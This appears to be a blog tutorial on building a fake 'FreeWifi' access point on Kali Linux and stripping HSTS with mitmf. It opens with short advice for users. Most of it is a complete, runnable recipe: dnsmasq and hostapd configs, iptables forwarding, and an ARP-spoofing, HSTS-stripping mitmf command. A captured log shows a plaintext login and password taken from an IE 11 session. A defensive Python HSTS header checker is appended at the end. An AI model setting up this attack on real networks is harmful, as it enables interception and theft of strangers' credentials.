Evil AP + HSTS Bypass

Connecting to a Wi-Fi network can be risky because someone could be manipulating and intercepting your data as it travels through the network. Hackers often use the approach below (or something similar) to broadcast a fake access point with a name that lures you to connect (e.g. Starbucks Wi-Fi) with the offer of free Internet. Once you’ve connected, it is significantly easier for an attacker to control the flow of data across the network. While certain browsers are patching to prevent attacks like this (Chrome is doing a good job), I was able to get a number of sites (facebook.com, for example) to load on a fully patched IE 11 and also on Safari. The best recommendations I can make to avoid falling victim to this type of attack are:

1. Don’t use public Wi-Fi. Use the hotspot on your phone instead.
2. If you must use public Wi-Fi, avoid logging in to sites like Facebook or your corporate email.
3. Keep your web browser patched.
4. Always make sure you see “https” in the URL bar, a lock, or a green bar (or all of the above).

Evil AP + HSTS Bypass:

What you’ll need:
Kali Linux (my distro of choice for something like this)
External USB Wi-Fi adapter (assumed to be wlan0 below)

Download the required tools:
apt-get install dnsmasq   # DNS/DHCP server
apt-get install hostapd   # broadcasts the fake/evil AP
apt-get install mitmf     # man-in-the-middle framework

Create a dnsmasq.conf file:
nano /etc/dnsmasq.conf
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
log-queries
log-dhcp

Create/modify hostapd.conf in /etc/hostapd to read:
interface=wlan0
ssid=FreeWifi
channel=1

Make sure you have working Internet access on another interface (such as eth0). This is required if you want the victim to get online after the MITM attack.
ifconfig wlan0 10.0.0.1/24 up
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward

hostapd /etc/hostapd/hostapd.conf
service dnsmasq start

mitmf -i wlan0 --arp --spoof --hsts --gateway=10.0.0.1

The following was captured from IE 11 (note the plaintext username and password in the POST body):

2016-02-11 23:43:52 10.0.0.55 [type:IE 11.0 os:Windows 8.1] Zapped a strict-trasport-security header
2016-02-11 23:43:56 10.0.0.55 POST Data (login.microsoftonline.com):
login=test@test.com&passwd=asdfasdf&ctx=rQIIAbNSzigpKSi20tcvyC8qSczRy09Ly0xO1UvOz9XLL0rPTAGxioS4BDISJqleffbQvfvflqDFbgt9VjGq4dSpn5OYl5KZl66XWFxQcYGRsYuJxdDA2HgTE6uvs6-T5wmmCWflbjEJ-hele6aEF7ulpqQWJZZk5uc9YuINLU4t8s_LqQzJz07Nm8TMl5OfnpkXX1yUFp-Wk18OFAAaX5CYXBJfkpmcnVqyi1kl1TDVPDkl1VzXxMggWdckxcxA19IoJUnX2NDcMtXcyDAlOc38AMuGkAssAj9YGHdx2hLnbPuSxKL01BJbVaO0lNS0xNKcErAwAA2&flowToken=AAABAAEAiL9Kn2Z27UubvWFPbm0gLSXQWl9vmwMOGzTJKDRZq5FdQ6SApcMCmMEZx-GPxr2lxnGuSkEa2gPOCK56YVuH7S-Y7RcQ5tAqwKBAS1RRSYsgAA&n1=89281&n2=-1455252118000&n3=-1455252118000&n4=90539&n5=90539&n6=90539&n7=90539&n8=NaN&n9=90539&n10=90540&n11=90540&n12=90617&n13=90540&n14=91805&n15=103&n16=91910&n17=91911&n18=91942&n19=420.3540455882576&n20=1&n21=1&n22=1455252213955.1806&n23=1&n24=1042.5330603926722&n25=0&n26=0&n27=0&n28=0&n29=-1455252209777&n30=-1455252209777&n31=0&n32=0&n33=0&n34=0&n35=0&n36=0&n37=0&n38=0&n39=0&n40=3152.197647642159&n41=3668.628915268915&n42=2615.5320457503562&n43=2659.820467688995&type=11&LoginOptions=3&NewUser=1&idsbho=1&PwdPad=&sso=&vv=&uiver=1&i12=0&i13=MSIE&i14=10.0&i15=1280&i16=705&i20=
2016-02-11 23:43:56 10.0.0.55 [type:IE 10.0 os:Windows 8] Sending Request: portal.office.com
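The first log line above shows the Strict-Transport-Security header being removed in transit. HSTS only protects a client that already holds the policy (or has the site on the browser's preload list), so the header's own directives decide how much room a stripping attack has. The following added example (not part of the original post or of mitmf) parses a Strict-Transport-Security value per RFC 6797 and reports the gaps a defender would want closed; the headers in the test are constructed samples.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
ONE_YEAR = 31536000  # seconds; the browser preload lists require at least this max-age

@dataclass
class HstsPolicy:
    max_age: int
    include_subdomains: bool
    preload: bool

def parse_hsts(header: Optional[str]) -> Optional[HstsPolicy]:
    """Parse a Strict-Transport-Security value per RFC 6797 s6.1; None if absent
    (what a client sees after an on-path attacker strips it) or malformed."""
    if header is None:
        return None
    max_age, include_subdomains, preload, seen = None, False, False, set()
    for raw in header.split(";"):
        name, _, value = raw.strip().partition("=")
        name = name.strip().lower()
        if not name:
            continue
        if name in seen:  # a directive may appear only once
            return None
        seen.add(name)
        if name == "max-age":
            value = value.strip().strip('"')
            if not re.fullmatch(r"\d+", value):
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_subdomains = True
        elif name == "preload":
            preload = True
        # unrecognised directives are ignored, as the RFC requires
    return None if max_age is None else HstsPolicy(max_age, include_subdomains, preload)

def assess(header: Optional[str]) -> List[str]:
    """List the gaps a header-stripping attack leaves open; empty means the policy is strong."""
    policy = parse_hsts(header)
    if policy is None:
        return ["no valid HSTS policy: plain HTTP is accepted on the next visit"]
    issues = []
    if policy.max_age < ONE_YEAR:
        issues.append(f"max-age {policy.max_age}s is below one year")
    if not policy.include_subdomains:
        issues.append("includeSubDomains missing: subdomains can be downgraded")
    if not policy.preload:
        issues.append("preload missing: protection depends on having seen the header")
    return issues
```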
